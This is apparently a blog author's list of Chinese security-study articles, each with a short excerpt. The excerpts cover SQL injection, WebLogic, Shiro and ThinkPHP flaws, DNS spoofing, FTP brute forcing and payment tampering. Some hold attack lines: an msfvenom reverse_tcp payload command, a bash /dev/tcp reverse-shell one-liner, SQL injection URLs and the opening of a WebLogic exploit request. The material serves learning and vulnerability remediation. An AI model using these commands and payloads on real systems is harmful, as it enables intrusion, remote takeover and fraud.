吾爱测试
这个作者很懒,什么都没留下…
展开
-
【无标题】
windows 操作系统安全基础windows操作系统安全加固原创 2022-11-08 21:36:34 · 1113 阅读 · 1 评论 -
cisp-pts学习笔记-sql注入
使用docker 部署1.联合查询(重点考)联合查询注入是回显注入的一种,也可以说联合注入的前提是,页面上要有回显位。那又引出了另一问题,什么是回显位?在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫回显位。order by 列数http://172.16.243.133:81/Less-1/?id=1’ order by 4–+http://172.16.243.133:81/Less-1/?id=1’ order by 3–+原创 2022-06-26 00:28:48 · 404 阅读 · 0 评论 -
DNS域传送漏洞复现(含靶场搭建)
DNS域传送漏洞复现(含靶场搭建)一、漏洞原理及危害二、环境搭建三、漏洞复现四、漏洞修复一、漏洞原理及危害DNS域传送漏洞是主备服务器间同步数据未进行严格校验导致的,攻击者可以模拟备份服务器向主服务器请求域内资源。二、环境搭建下载https://github.com/vulhub/vulhub/tree/master/dns/dns-zone-transfer内的所有文件到linux电脑,切换目录后使用docker-compose up -d进行搭建注意:部分服务器默认开启服务占用53端口,直接原创 2022-03-09 19:09:45 · 5459 阅读 · 0 评论 -
正则表达式
一、校验数字的表达式数字:1$n位的数字:^\d{n}$至少n位的数字:^\d{n,}$m-n位的数字:^\d{m,n}$零和非零开头的数字:^(0|[1-9][0-9])$非零开头的最多带两位小数的数字:^([1-9][0-9])+(.[0-9]{1,2})?$带1-2位小数的正数或负数:^(-)?\d+(.\d{1,2})$正数、负数、和小数:^(-|+)?\d+(.\d+)?$有两位小数的正实数:2+(.[0-9]{2})?$有1~3位小数的正实数:3+(.[0-9]{1,3})?原创 2022-01-10 15:01:46 · 100 阅读 · 0 评论 -
shellcode 上线转内存马
shellcode 上线转内存马1、使用msf制作shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.109.135 LPORT=1234 -f exe > /home/kali/Desktop/1.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch select原创 2021-10-12 21:41:20 · 289 阅读 · 0 评论 -
ettercap dns投毒
ettercap dns投毒1.攻击前提:1. 与目标处于相同局域网2. 知道对方经常访问的网站3. 知道网关地址 可以ifconfig查看2.在etter.dns中添加dns解析记录 将目标域名解析到目标主机此处将www.baidu.com解析到csdn.netwww.baidu.com A 39.106.226.1423.配置ettercap图形界面3.1 配置网卡3.2 扫描局域网主机 配置target1、target2 3.3 打开dns_spoof模块原创 2021-10-10 10:09:05 · 171 阅读 · 0 评论 -
kali2021 实现nginx 反向代理
kali2021 实现nginx 反向代理1.正向代理与反向代理的区别 共同的目的 : 实现源地址到目的地址的访问 区别: 1.正向代理需要在客户端进行配置,如burp,部分翻墙软件等 2.反向代理,对于客户端是无感知的,有点类似与目的端口映射, 将服务映射到公网 2.反向代理在攻防中的应用 1.钓鱼,进行社会工程学攻击,陪喝wireshark等抓包软件抓取流量包 2.VPS,当被攻击的服务器在企业内网,我们无法找到一台机器可以访问他时。 在该服务器上开启一个服务,并将其代理到原创 2021-10-09 14:07:56 · 503 阅读 · 0 评论 -
python读取csv文件并进行端口扫描源码
# python读取csv文件并进行端口扫描源码import csvimport socketfrom concurrent.futures.thread import ThreadPoolExecutorimport redef csv_reader(filename): ip_list = [] f = csv.reader(open(filename, 'r')) for i in f: if i[8] not in ip_list:原创 2021-09-21 13:41:58 · 151 阅读 · 0 评论 -
centos7操作系统中安装mysql数据库
centos7操作系统中安装mysql数据库1、下载和安装mysql#下载rpm文件 wget http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm#执行rpm源文件 rpm -ivh mysql-community-release-el7-5.noarch.rpm #执行安装文件 ,安装过程中全部y继续向下执行yum install mysql-community-server到这里就已经安装完了Instal原创 2021-09-03 20:59:20 · 147 阅读 · 2 评论 -
Wireshark常用过滤使用方法
Wireshark常用过滤使用方法过滤源ip、目的ip。在wireshark的过滤规则框Filter中输入过滤条件。如查找目的地址为192.168.101.8的包,ip.dst192.168.101.8;查找源地址为ip.src1.1.1.1端口过滤。如过滤80端口,在Filter中输入,tcp.port80,这条规则是把源端口和目的端口为80的都过滤出来。使用tcp.dstport80只过滤目的端口为80的,tcp.srcport==80只过滤源端口为80的包协议过滤比较简单,直接在Filte原创 2021-09-03 20:04:57 · 1852 阅读 · 0 评论 -
基于python的FTP暴力破解程序
基于python的FTP暴力破解程序任务标题:FTP暴力破解程序任务目标编写一个针对ftp服务器进行暴力破解的程序任务描述ftp是一个文件传输协议,用来文件共享,fto通常存在匿名访问和弱口令的问题,通过编写ftp暴力破解的程序可以理解爆破的原理,实现自动化的渗透。报告要求1、理解ftp协议的原理2、编写ftp暴力破解程序,收集常用字典3、通过zoomeye搜集若干ftp服务器,尝试爆破扩展任务尝试使用多线程来提升爆破的效率运行截图程序描述1.基于多线程进行FTP暴力破解2原创 2021-07-26 23:36:18 · 418 阅读 · 0 评论 -
使用协程进行端口扫描
使用协程进行端口扫描运行截图(一)设计目的在快速扫描的同时提高准确性并减少资源消耗2. 解决端口扫描效率低下的问题3. 减少多线程或多进程扫描的资源消耗4. 解决SYN等半连接扫描结果不准确的问题5. 图形化界面(二)量化效率及比较扫描模式端口数耗时协程模式6553515-20s多线程+SYN扫描(1000个线程)102420-25s(三)代码和功能详解1.代码拆分(1)核心代码部分执行一个端口扫描 函数 task异步调用(协程) 函数原创 2021-07-21 23:31:20 · 191 阅读 · 0 评论 -
第一部分 SQL查询语句的学习
**第一部分 SQL查询语句的学习**习题答案通过SQL查询分析器输出 查询的视图,将查询语句和视图的截图贴在相应习题的下方。将第一部分与第二部分这2个文档打包,然后提交任务:http://bbs.fanruan.com/task-94.html*答案截图示例:*SELECT * FROM 产品;**单表查询**–查询订购日期在1996年7月1日至1996年7月15日之间的订单的订购日期、订单ID、客户ID和雇员ID等字段的值SELECT 订购日期,订单ID,客户ID,雇员ID from 订原创 2021-05-14 19:38:09 · 314 阅读 · 0 评论 -
kali Linux 2020版 设置中文
kali Linux 2020版 设置中文kali linux 2020版 虚拟机文件默认为英语状态,好多小伙伴表示英语看的太费劲了,下面来教大家怎样设置中文1、如果没有将kali的更新源切换成国内的源,先将更新源切换成国内的(详细更新源切换请看up的另一篇文章)2、在root用户下直接输入“dpkg-reconfigure locales”命令,如果是kali普通用户则输入“sudodpkg-reconfigure locales” 然后输入密码kali3、先找到en_US.UT...原创 2021-04-18 18:17:43 · 10950 阅读 · 3 评论 -
Linux 用户管理
Linux 用户管理一、目标首要原则 不求最快 只求最好基本要求 了解用户的概念、原理、以及相关的系统命令需要掌握 用户帐户的添加、删除与修改 用户口令管理 用户组的管理需要了解 与账户有关的系统文件二、用户账号的管理(一)添加 useraddexample: useradd root1@ubuntu:~$ useradd -h Usage: useradd [options] LOGIN # useradd 选原创 2021-04-17 20:59:35 · 107 阅读 · 0 评论 -
升级sudo版本至1.9.5p2,解决Sudo权限提 升漏洞(CVE-2021-3156)
升级sudo版本至1.9.5p2,解决Sudo权限提 升漏洞(CVE-2021-3156)环境系统:suse12sudo:1.8.20p2(使用 sudo --version)目标sudo:1.9.5p2准备查看本地sudo版本https://www.sudo.ws/dist/3.下载最新版本到服务器并解压wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz && t原创 2021-03-12 17:31:49 · 845 阅读 · 0 评论 -
Shiro反序列化漏洞利用笔记
Shiro反序列化漏洞利用笔记Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。一、Shiro反序列化漏洞1.1 安全框架Apache S原创 2020-12-11 01:04:08 · 636 阅读 · 3 评论 -
Tomcat样列目录session操控漏洞
Tomcat样列目录session操控漏洞复现起源:近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。在这里感谢公司Bearcat师傅和残忆师傅以及李师傅等指导和共享精神。题外话:今天我们复现Tomcat样例目录session操控漏洞。在实战中也碰到过一些样例目录examples开放可以操控操控全局session的一些Tomcat。不过该漏洞挺鸡肋的。可能这里因为我原创 2020-12-07 15:59:50 · 680 阅读 · 0 评论 -
CVE-2020-1472 域内提权复现
CVE-2020-1472 域内提权复现*漏洞介绍*在今年9月份,国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情,网上也随即公开了Exp。是近几年windows上比较重量级别的一个漏洞。通过该漏洞,攻击者只需能够访问域控的445端口,在无需任何凭据的情况下能拿到域管的权限。该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netlogon中RPC函数NetrServerPasswordSet2原创 2020-12-07 15:30:41 · 475 阅读 · 0 评论 -
反弹 shell 的 N 种方式
反弹 shell 的 N 种方式在实际的渗透测试过程中,一旦拿到高权限 shell,马上就会准备做流量代理,尝试各种反向代理和正向代理,然后选择流量通透性较好的机器就要准备内网渗透了,关于反向代理和正向代理,有时间我在写,比较杂,而且为了保证各位的最佳阅读体验,所有的工具和方式我都要实测之后再整理发布相关知识文章,这一次我来讲一下关于反弹 shell 的知识,这部分知识可能说起来一句话也行:bash -i >& /dev/tcp/10.22.225.77/777 0>&am原创 2020-12-03 22:04:47 · 241 阅读 · 0 评论 -
Oracle WebLogic Server未授权远程代码执行漏洞处置方案
Oracle WebLogic Server未授权远程代码执行漏洞处置方案2020年10月29日,Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,未经身份验证的远程攻击者通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,成功利用此漏洞的攻击者可在未经身份验证的情况下接管 WebLogic Server Console ,并执行任意代码。目前已经POC已经被公。由于此漏洞通过HTTP协议利用,利用门槛低危害大原创 2020-11-06 17:47:42 · 1399 阅读 · 1 评论 -
Weblogic反序列化漏洞(绕过CVE-2019-2725)处置方案
Weblogic反序列化漏洞(绕过CVE-2019-2725)处置方案TAG:Oracle、Weblogic、远程代码执行、wls9-async、wls-wsat、CNVD-C-2019-48814、CVE-2019-2725危害等级:高,监测到CVE-2019-2725漏洞补丁存在绕过方式,可造成远程代码执行。版本:1.01漏洞概述近日,绿盟科技安全团队发现针对Oracle Weblogic的在野漏洞利用,攻击特征与CVE-2019-2725类似。此攻击可以绕过O原创 2020-11-06 17:46:33 · 738 阅读 · 1 评论 -
HTTP协议
HTTP(s)协议方法:GETHEAD:仅需要发送响应体首部PUTPOSTTRACE:跟踪报文到服务器经过几次代理OPTIONS:在服务器可以执行哪些方法DELETE常见响应码100:收到了请求的初始部分,请客户端继续200:客户端请求成功201:用于创建服务器对象的请求202:请求已接受,但服务器还未对其执行任何动作205:主要用于浏览器的代码,负责告知浏览器清...原创 2020-11-03 06:49:02 · 64 阅读 · 0 评论 -
Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989)
Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989)Apache Shiro是一个强大且易用的Java安全框架,它可以用来执行身份验证、授权、密码和会话管理。目前常见集成于各种应用中进行身份验证,授权等。漏洞详情腾讯安全玄武实验室研究员发现在Apache Shiro 1.5.3之前的版本,将Apache Shiro与Spring控制器一起使用时,特制请求可能会导致身份验证绕过。漏洞发现者该漏洞由腾讯安全玄武实验室的Ruilin发现并报告,此外来自边界无限的淚笑也独立向官方报转载 2020-11-03 04:38:58 · 3368 阅读 · 0 评论 -
ThinkPHP漏洞总结
ThinkPHP漏洞总结ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。0x00前言本篇文章将针对ThinkPHP的历史漏洞进行整理复现,今后爆出的ThinkPHP漏洞,也将进行补充更新。0x01ThinkPHP远程命令执行/代码执行漏洞一,ThinkPHP原创 2020-11-03 04:37:05 · 2749 阅读 · 0 评论 -
支付漏洞学习
支付漏洞学习首先先了解支付漏洞:支付漏洞的理解通常都是篡改价格。比如,一分钱买任何东西。少收款、企业收费产品被免费使用,直接造成企业的经济损失。这次带来的是某辅助论坛的邀请码购买处的支付漏洞实战,仅供参考。首先打开目标:https://www.XXXX.com/rjyfk_invite-in.html此处是它购买邀请码的地址:然后填写好邮箱后点击 立即购买 然后利用burp进行抓包因为价格是10 我们搜索“10”得到如下结果:可以看到 “total_fee=10” 那么10就代表了邀原创 2020-11-03 04:36:00 · 313 阅读 · 0 评论 -
Apache Shiro身份验证绕过漏洞处置方案
Apache Shiro身份验证绕过漏洞处置方案2020年8月18日Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。鉴于该漏洞影响较大,建议尽快升级到最新版本。漏洞描述Apache Shiro是一个强大且易用的Java安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用Shiro的易用API,您可以快速、轻松地保护任何应用程序——从最小的移动应用程序到最大的WEB原创 2020-11-03 04:34:16 · 1600 阅读 · 0 评论 -
WebSphere远程代码执行漏洞处置方案
WebSphere远程代码执行漏洞处置方案2020年6月5日,IBM官方发布安全通告修复了WebSphere Application Server中的远程代码执行漏洞(CVE-2020-4450),根据IBM官方通告,WebSphere Application Server存在一处IIOP反序列化漏洞,将会导致远程代码执行,未经身份认证的攻击者可以通过IIOP协议远程攻击WebSphere Application Server服务器。鉴于该漏洞影响较大,建议客户尽快安装软件更新。漏洞描述WebSphe原创 2020-11-03 04:32:48 · 1544 阅读 · 0 评论 -
Weblogic 反序列化漏洞(CVE-2017-10271)检测与利用复现
Weblogic 反序列化漏洞(CVE-2017-10271)检测与利用复现版权Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。漏洞环境搭建可以参考:https://blog.csdn.net/qq_29647709/article/details/84892582漏洞检测检测工具下载https://pan.baidu.com/s/1bpg3p原创 2020-10-30 17:59:31 · 1536 阅读 · 0 评论 -
CVE-2020–14882 Weblogic RCE
CVE-2020–14882 Weblogic RCEShellSessioncoherence-rest.jar#com.tangosol.coherence.mvel2.sh.ShellSession有效载荷POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1Host: 172.16.242.134:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windo原创 2020-10-29 22:54:43 · 561 阅读 · 0 评论 -
高危端口关闭指南
高危端口包含135、137、138、139、445、3389端口。本行电脑禁止开放高危端口,高危端口必须进行关闭(如必须开放需单独做说明),高危端口对外开放严重影响终端安全原创 2020-07-16 14:16:49 · 7616 阅读 · 0 评论 -
Tomcat远程代码执行漏洞利用与安全测试实践
TOMCAT远程代码执行漏洞(CVE-2017-12615)NTFS文件流:tomcat7.0.79下载功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowc...原创 2020-11-03 06:47:52 · 592 阅读 · 2 评论 -
SQL注入
SQL注入漏洞原理SQL注入漏洞的原理是由于开发者在白那些操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使用恶意语句在数据库引擎中执行漏洞危害*SQL注入是直接面对数据库进行的,所以危害不言而喻,主要有以下几种危害权限较大的情况下,可以通过SQL注入直接写入WEBshell或者直接执行系统命令权限较小的情况下,可以通过获得管理员权...原创 2020-11-03 06:48:36 · 179 阅读 · 0 评论 -
Cookie详解
Cookie详解如何查看自己的cookiecookie分为会话cookie和长久cookie会话cookie打开浏览器 按F12 Network在浏览器发一个请求www.baidu.com按F12 headers下面,请求体、相应体,其中response会有一个set-cookie向服务器请求,一般set-cookie到会话结束就结束,request会有一个cookie信息。如何查看...原创 2019-04-18 12:04:21 · 614 阅读 · 1 评论